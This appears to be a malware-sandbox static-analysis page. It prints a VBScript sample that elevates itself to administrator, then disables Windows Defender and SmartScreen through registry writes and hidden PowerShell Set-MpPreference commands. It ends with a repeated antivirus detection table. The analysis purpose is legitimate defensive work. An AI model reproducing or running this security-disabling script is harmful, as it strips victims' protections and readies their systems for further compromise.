Static | ZeroBOX

WScript.Sleep 10

If Not WScript.Arguments.Named.Exists("elevate") Then

CreateObject("Shell.Application").ShellExecute WScript.FullName _

, """" & WScript.ScriptFullName & """ /elevate", "", "runas", 1

WScript.Quit

End If

On Error Resume Next

Set WshShell = CreateObject("WScript.Shell")

WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",1,"REG_DWORD"

WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring","1","REG_DWORD"

WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection","1","REG_DWORD"

WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable","1","REG_DWORD"

WshShell.RegWrite "HKLM\SOFTWARE\Policies\Microsoft\System\EnableSmartScreen","0","REG_DWORD"

WScript.Sleep 100

outputMessage("Set-MpPreference -DisableRealtimeMonitoring $true")

outputMessage("Set-MpPreference -DisableBehaviorMonitoring $true")

outputMessage("Set-MpPreference -DisableBlockAtFirstSeen $true")

outputMessage("Set-MpPreference -DisableIOAVProtection $true")

outputMessage("Set-MpPreference -DisableScriptScanning $true")

outputMessage("Set-MpPreference -SubmitSamplesConsent 2")

outputMessage("Set-MpPreference -MAPSReporting 0")

outputMessage("Set-MpPreference -HighThreatDefaultAction 6 -Force")

outputMessage("Set-MpPreference -ModerateThreatDefaultAction 6")

outputMessage("Set-MpPreference -LowThreatDefaultAction 6")

outputMessage("Set-MpPreference -SevereThreatDefaultAction 6")

Sub outputMessage(byval args)

On Error Resume Next

Set objShell = CreateObject("Wscript.shell")

objShell.run("powershell " + args), 0

End Sub

Antivirus	Signature
Bkav	Clean
Lionic	Trojan.Script.Generic.4!c
DrWeb	Clean
ClamAV	Clean
CMC	Clean
CAT-QuickHeal	Clean
ALYac	Clean
Malwarebytes	Clean
VIPRE	Clean
Sangfor	Trojan.Generic-VBS.Save.e95c6ff2
K7AntiVirus	Clean
K7GW	Clean
BitDefenderTheta	Clean
Cyren	Clean
Symantec	Clean
ESET-NOD32	Clean
TrendMicro-HouseCall	Clean
Avast	Script:SNH-gen [Trj]
Cynet	Clean
Kaspersky	HEUR:Trojan.Script.Generic
BitDefender	Clean
NANO-Antivirus	Clean
SUPERAntiSpyware	Clean
MicroWorld-eScan	Clean
Tencent	Clean
Ad-Aware	Clean
Emsisoft	Clean
Comodo	Clean
F-Secure	Clean
Baidu	Clean
Zillya	Clean
TrendMicro	Clean
McAfee-GW-Edition	BehavesLike.VBS.Backdoor.zp
FireEye	Clean
Sophos	Clean
Ikarus	Clean
Jiangmin	Clean
Avira	Clean
Antiy-AVL	Clean
Kingsoft	Clean
Microsoft	Clean
Gridinsoft	Clean
Arcabit	Clean
ViRobot	Clean
ZoneAlarm	HEUR:Trojan.Script.Generic
GData	Clean
AhnLab-V3	Clean
McAfee	Clean
TACHYON	Clean
VBA32	Clean
Zoner	Clean
Rising	Clean
Yandex	Clean
MAX	Clean
MaxSecure	Clean
Fortinet	VBS/Agent.917B!tr
AVG	Script:SNH-gen [Trj]
Panda	Clean

Antivirus

Signature

Bkav

Clean

Lionic

Trojan.Script.Generic.4!c

DrWeb

Clean

ClamAV

Clean

CMC

Clean

CAT-QuickHeal

Clean

ALYac

Clean

Malwarebytes

Clean

VIPRE

Clean

Sangfor

Trojan.Generic-VBS.Save.e95c6ff2

K7AntiVirus

Clean

K7GW

Clean

BitDefenderTheta

Clean

Cyren

Clean

Symantec

Clean

ESET-NOD32

Clean

TrendMicro-HouseCall

Clean

Avast

Script:SNH-gen [Trj]

Cynet

Clean

Kaspersky

HEUR:Trojan.Script.Generic

BitDefender

Clean

NANO-Antivirus

Clean

SUPERAntiSpyware

Clean

MicroWorld-eScan

Clean

Tencent

Clean

Ad-Aware

Clean

Emsisoft

Clean

Comodo

Clean

F-Secure

Clean

Baidu

Clean

Zillya

Clean

TrendMicro

Clean

McAfee-GW-Edition

BehavesLike.VBS.Backdoor.zp

FireEye

Clean

Sophos

Clean

Ikarus

Clean

Jiangmin

Clean

Avira

Clean

Antiy-AVL

Clean

Kingsoft

Clean

Microsoft

Clean

Gridinsoft

Clean

Arcabit

Clean

ViRobot

Clean

ZoneAlarm

HEUR:Trojan.Script.Generic

GData

Clean

AhnLab-V3

Clean

McAfee

Clean

TACHYON

Clean

VBA32

Clean

Zoner

Clean

Rising

Clean

Yandex

Clean

MAX

Clean

MaxSecure

Clean

Fortinet

VBS/Agent.917B!tr

AVG

Script:SNH-gen [Trj]

Panda

Clean